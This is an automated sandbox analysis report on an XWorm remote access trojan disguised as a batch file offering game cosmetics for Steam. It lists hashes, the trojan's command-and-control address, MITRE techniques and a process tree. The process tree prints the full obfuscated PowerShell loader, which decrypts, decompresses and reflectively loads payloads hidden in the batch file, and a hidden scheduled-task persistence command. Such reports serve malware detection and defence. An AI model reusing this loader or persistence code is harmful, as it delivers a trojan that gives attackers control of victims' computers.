xworm | 6a742c075c1099f98e1fe68d4049dbed84ee8015ad349cbe78e0fe969c841a7e

Analysis

max time kernel
1472s
max time network
1488s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
14-10-2024 00:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ss cosmeticx for gtag steam.bat
Size

294KB
MD5

be47f172f3f7ea7f36bcc6dcb6a410f2
SHA1

8da368d5baf6a818ad6148e43a2b7f69b8a56664
SHA256

6a742c075c1099f98e1fe68d4049dbed84ee8015ad349cbe78e0fe969c841a7e
SHA512

b2f43c4676dd0a0ef0452c48f17cdf849f4e8765afbc122deeca08a15a487be2c4c8072e2c2ff02367cb6130a0482817f92ceb117f6ec6c9651630ec77fca68d
SSDEEP

6144:Xt99Rt0+CSyli/VEb/ZOeTbaRuA6m/BvRj8UnJfDRDJkGfVD626QTLDC4uQ:XtrRtiyeNa8AOuDRDJPND6KN

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

147.185.221.23:13469

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3256-48-0x0000014372F50000-0x0000014372F68000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3256	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3080	powershell.exe
3256	powershell.exe
4164	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4164	powershell.exe
4164	powershell.exe
3080	powershell.exe
3080	powershell.exe
3256	powershell.exe
3256	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeIncreaseQuotaPrivilege	3080	powershell.exe
Token: SeSecurityPrivilege	3080	powershell.exe
Token: SeTakeOwnershipPrivilege	3080	powershell.exe
Token: SeLoadDriverPrivilege	3080	powershell.exe
Token: SeSystemProfilePrivilege	3080	powershell.exe
Token: SeSystemtimePrivilege	3080	powershell.exe
Token: SeProfSingleProcessPrivilege	3080	powershell.exe
Token: SeIncBasePriorityPrivilege	3080	powershell.exe
Token: SeCreatePagefilePrivilege	3080	powershell.exe
Token: SeBackupPrivilege	3080	powershell.exe
Token: SeRestorePrivilege	3080	powershell.exe
Token: SeShutdownPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeSystemEnvironmentPrivilege	3080	powershell.exe
Token: SeRemoteShutdownPrivilege	3080	powershell.exe
Token: SeUndockPrivilege	3080	powershell.exe
Token: SeManageVolumePrivilege	3080	powershell.exe
Token: 33	3080	powershell.exe
Token: 34	3080	powershell.exe
Token: 35	3080	powershell.exe
Token: 36	3080	powershell.exe
Token: SeIncreaseQuotaPrivilege	3080	powershell.exe
Token: SeSecurityPrivilege	3080	powershell.exe
Token: SeTakeOwnershipPrivilege	3080	powershell.exe
Token: SeLoadDriverPrivilege	3080	powershell.exe
Token: SeSystemProfilePrivilege	3080	powershell.exe
Token: SeSystemtimePrivilege	3080	powershell.exe
Token: SeProfSingleProcessPrivilege	3080	powershell.exe
Token: SeIncBasePriorityPrivilege	3080	powershell.exe
Token: SeCreatePagefilePrivilege	3080	powershell.exe
Token: SeBackupPrivilege	3080	powershell.exe
Token: SeRestorePrivilege	3080	powershell.exe
Token: SeShutdownPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeSystemEnvironmentPrivilege	3080	powershell.exe
Token: SeRemoteShutdownPrivilege	3080	powershell.exe
Token: SeUndockPrivilege	3080	powershell.exe
Token: SeManageVolumePrivilege	3080	powershell.exe
Token: 33	3080	powershell.exe
Token: 34	3080	powershell.exe
Token: 35	3080	powershell.exe
Token: 36	3080	powershell.exe
Token: SeIncreaseQuotaPrivilege	3080	powershell.exe
Token: SeSecurityPrivilege	3080	powershell.exe
Token: SeTakeOwnershipPrivilege	3080	powershell.exe
Token: SeLoadDriverPrivilege	3080	powershell.exe
Token: SeSystemProfilePrivilege	3080	powershell.exe
Token: SeSystemtimePrivilege	3080	powershell.exe
Token: SeProfSingleProcessPrivilege	3080	powershell.exe
Token: SeIncBasePriorityPrivilege	3080	powershell.exe
Token: SeCreatePagefilePrivilege	3080	powershell.exe
Token: SeBackupPrivilege	3080	powershell.exe
Token: SeRestorePrivilege	3080	powershell.exe
Token: SeShutdownPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeSystemEnvironmentPrivilege	3080	powershell.exe
Token: SeRemoteShutdownPrivilege	3080	powershell.exe
Token: SeUndockPrivilege	3080	powershell.exe
Token: SeManageVolumePrivilege	3080	powershell.exe
Token: 33	3080	powershell.exe
Token: 34	3080	powershell.exe
Token: 35	3080	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 912 wrote to memory of 4164	912	cmd.exe	78
PID 912 wrote to memory of 4164	912	cmd.exe	78
PID 4164 wrote to memory of 3080	4164	powershell.exe	79
PID 4164 wrote to memory of 3080	4164	powershell.exe	79
PID 4164 wrote to memory of 4788	4164	powershell.exe	82
PID 4164 wrote to memory of 4788	4164	powershell.exe	82
PID 4788 wrote to memory of 5012	4788	WScript.exe	83
PID 4788 wrote to memory of 5012	4788	WScript.exe	83
PID 5012 wrote to memory of 3256	5012	cmd.exe	85
PID 5012 wrote to memory of 3256	5012	cmd.exe	85

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ss cosmeticx for gtag steam.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MgnuZSzTu17Yhp4hwWzsvhgscLHcnyZMocvwuy+MWdw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SIukVXrNvfVq6KjuHyZRLw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $arePn=New-Object System.IO.MemoryStream(,$param_var); $NTyMA=New-Object System.IO.MemoryStream; $qjyXc=New-Object System.IO.Compression.GZipStream($arePn, [IO.Compression.CompressionMode]::Decompress); $qjyXc.CopyTo($NTyMA); $qjyXc.Dispose(); $arePn.Dispose(); $NTyMA.Dispose(); $NTyMA.ToArray();}function execute_function($param_var,$param2_var){ $iTabt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pdcBA=$iTabt.EntryPoint; $pdcBA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ss cosmeticx for gtag steam.bat';$avPbU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ss cosmeticx for gtag steam.bat').Split([Environment]::NewLine);foreach ($TtrAP in $avPbU) { if ($TtrAP.StartsWith(':: ')) { $neJKQ=$TtrAP.Substring(3); break; }}$payloads_var=[string[]]$neJKQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_948_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_948.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3080
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_948.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_948.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MgnuZSzTu17Yhp4hwWzsvhgscLHcnyZMocvwuy+MWdw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SIukVXrNvfVq6KjuHyZRLw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $arePn=New-Object System.IO.MemoryStream(,$param_var); $NTyMA=New-Object System.IO.MemoryStream; $qjyXc=New-Object System.IO.Compression.GZipStream($arePn, [IO.Compression.CompressionMode]::Decompress); $qjyXc.CopyTo($NTyMA); $qjyXc.Dispose(); $arePn.Dispose(); $NTyMA.Dispose(); $NTyMA.ToArray();}function execute_function($param_var,$param2_var){ $iTabt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pdcBA=$iTabt.EntryPoint; $pdcBA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_948.bat';$avPbU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_948.bat').Split([Environment]::NewLine);foreach ($TtrAP in $avPbU) { if ($TtrAP.StartsWith(':: ')) { $neJKQ=$TtrAP.Substring(3); break; }}$payloads_var=[string[]]$neJKQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59d37a8c588c83e806678c7fb5d1229f

SHA1
4396d68567f30f08e08a269802fe3f4784b88c5b

SHA256
c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

SHA512
19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_havlpanw.xyb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_948.bat

Filesize
294KB

MD5
be47f172f3f7ea7f36bcc6dcb6a410f2

SHA1
8da368d5baf6a818ad6148e43a2b7f69b8a56664

SHA256
6a742c075c1099f98e1fe68d4049dbed84ee8015ad349cbe78e0fe969c841a7e

SHA512
b2f43c4676dd0a0ef0452c48f17cdf849f4e8765afbc122deeca08a15a487be2c4c8072e2c2ff02367cb6130a0482817f92ceb117f6ec6c9651630ec77fca68d

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_948.vbs

Filesize
115B

MD5
32bbbffc2e78d7f3603d17a69bc2b366

SHA1
d78c430cc7e9a4e613433db5096a85981f0569fa

SHA256
15ff65109a1845292392a55a40ea3e7fcc273917005c524a4292e28ce01d4de1

SHA512
1903f5822f9aa417e6271a70d1d0d9624e8d8154e09639c663f829867b209425cc737db27710bb466ace6b4098334e223fa2d8dbc39dc03b19d02a0a9d49a4d0

Download Submit
memory/3080-26-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3080-30-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3080-27-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3080-16-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3080-17-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/3256-48-0x0000014372F50000-0x0000014372F68000-memory.dmp

Filesize
96KB

Download
memory/4164-0-0x00007FFCAE873000-0x00007FFCAE875000-memory.dmp

Filesize
8KB

Download
memory/4164-14-0x000001F99B6E0000-0x000001F99B71A000-memory.dmp

Filesize
232KB

Download
memory/4164-13-0x000001F99B6D0000-0x000001F99B6D8000-memory.dmp

Filesize
32KB

Download
memory/4164-12-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/4164-11-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/4164-9-0x000001F99B670000-0x000001F99B692000-memory.dmp

Filesize
136KB

Download
memory/4164-10-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download
memory/4164-49-0x00007FFCAE873000-0x00007FFCAE875000-memory.dmp

Filesize
8KB

Download
memory/4164-50-0x00007FFCAE870000-0x00007FFCAF332000-memory.dmp

Filesize
10.8MB

Download